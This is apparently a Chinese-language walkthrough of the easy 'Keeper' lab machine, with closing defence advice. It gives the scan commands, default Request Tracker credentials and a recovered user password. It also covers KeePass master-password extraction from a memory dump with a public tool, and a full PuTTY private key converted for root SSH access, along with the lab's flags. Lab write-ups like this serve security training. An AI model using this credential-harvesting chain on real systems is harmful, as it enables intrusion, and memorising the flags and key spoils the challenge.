[Meachines] [Easy] Keeper Request Tracker (RT)+KeePass进程残留主密钥泄露+PUTTY-PPK转id_rsa私钥权限提升
字数 1293 2025-08-29 08:30:30
Keeper渗透测试实战教学文档
1. 信息收集阶段
1.1 目标识别
- 目标IP:
10.10.11.227 - 扫描命令:
ip='10.10.11.227'; itf='tun0';
if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m";
ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//');
if [ -n "$ports" ]; then
echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m";
nmap -Pn -sV -sC -p "$ports" "$ip";
else
echo -e "\e[31m[!] No open ports found on $ip.\e[0m";
fi;
else
echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m";
fi
1.2 端口扫描结果
- 22/tcp: OpenSSH 8.9p1 Ubuntu 3ubuntu0.3
- SSH主机密钥:
- ECDSA: 256 3539d439404b1f6186dd7c37bb4b989e
- ED25519: 256 1ae972be8bb105d5effedd80d8efc066
- SSH主机密钥:
- 80/tcp: nginx 1.18.0 (Ubuntu)
- HTTP标题: Login
- 服务器头: nginx/1.18.0 (Ubuntu)
2. Web应用渗透
2.1 Request Tracker (RT)访问
- 添加主机名到/etc/hosts:
echo '10.10.11.227 tickets.keeper.htb' >> /etc/hosts
- 访问URL:
- http://tickets.keeper.htb/
- 默认凭证:
- 用户名:
root - 密码:
password
- 用户名:
- 管理界面:
- http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
- 发现用户密码:
Welcome2023!
3. 初始访问
3.1 获取用户标志
- 用户标志位置:
3e065105fb5ec6a9d4d4875f1fa99185
4. 权限提升
4.1 KeePass主密钥提取
- 从目标系统下载KeePass相关文件:
scp lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip /tmp/
- 使用KeePass密码转储工具:
- 工具地址: https://github.com/vdohney/keepass-password-dumper
- 安装依赖:
#!/bin/bash
wget https://packages.microsoft.com/config/debian/11/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
dpkg -i packages-microsoft-prod.deb
apt update
apt install -y dotnet-sdk-7.0
dotnet --version
- 提取主密钥:
dotnet run KeePassDumpFull.dmp "dgrød med fløde"
- 解密passcodes.kdbx文件:
- 使用Keeweb在线工具: https://app.keeweb.info/
- 密码:
rødgrød med fløde
4.2 PPK转id_rsa私钥
- PPK文件内容示例:
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81TEHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LMCj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1TuFVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQLxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6joDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCihkmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputYf7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzTVkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivzUXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWsOxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGzin6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1rSsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEaxHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkAAACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faDAF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGyNNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
- 使用puttygen转换PPK为OpenSSH格式:
puttygen ppk -O private-openssh -o id_rsa
- 使用转换后的私钥进行SSH登录:
ssh root@10.10.11.227 -i id_rsa
4.3 获取root标志
- root标志位置:
00172c33f60bd92c400e0bd2825d1301
5. 关键知识点总结
-
信息收集技巧:
- 使用masscan进行快速端口扫描
- 使用nmap进行服务版本探测
-
Web应用渗透:
- Request Tracker默认凭证利用
- 用户管理界面URL构造
-
权限提升方法:
- KeePass进程内存转储分析
- 使用KeePass密码转储工具提取主密钥
- PPK格式私钥转换为OpenSSH格式
-
工具使用:
- KeePass密码转储工具安装与使用
- puttygen进行密钥格式转换
6. 防御建议
-
针对KeePass的安全措施:
- 避免长时间保持KeePass进程运行
- 使用安全桌面功能防止内存转储
- 定期更改主密码
-
SSH安全:
- 禁用root直接登录
- 使用密钥认证时设置强密码保护
- 定期轮换SSH密钥
-
Web应用安全:
- 更改默认管理凭证
- 实施账户锁定策略
- 限制管理界面访问IP
-
系统安全:
- 定期检查进程内存转储风险
- 监控异常登录行为
- 实施最小权限原则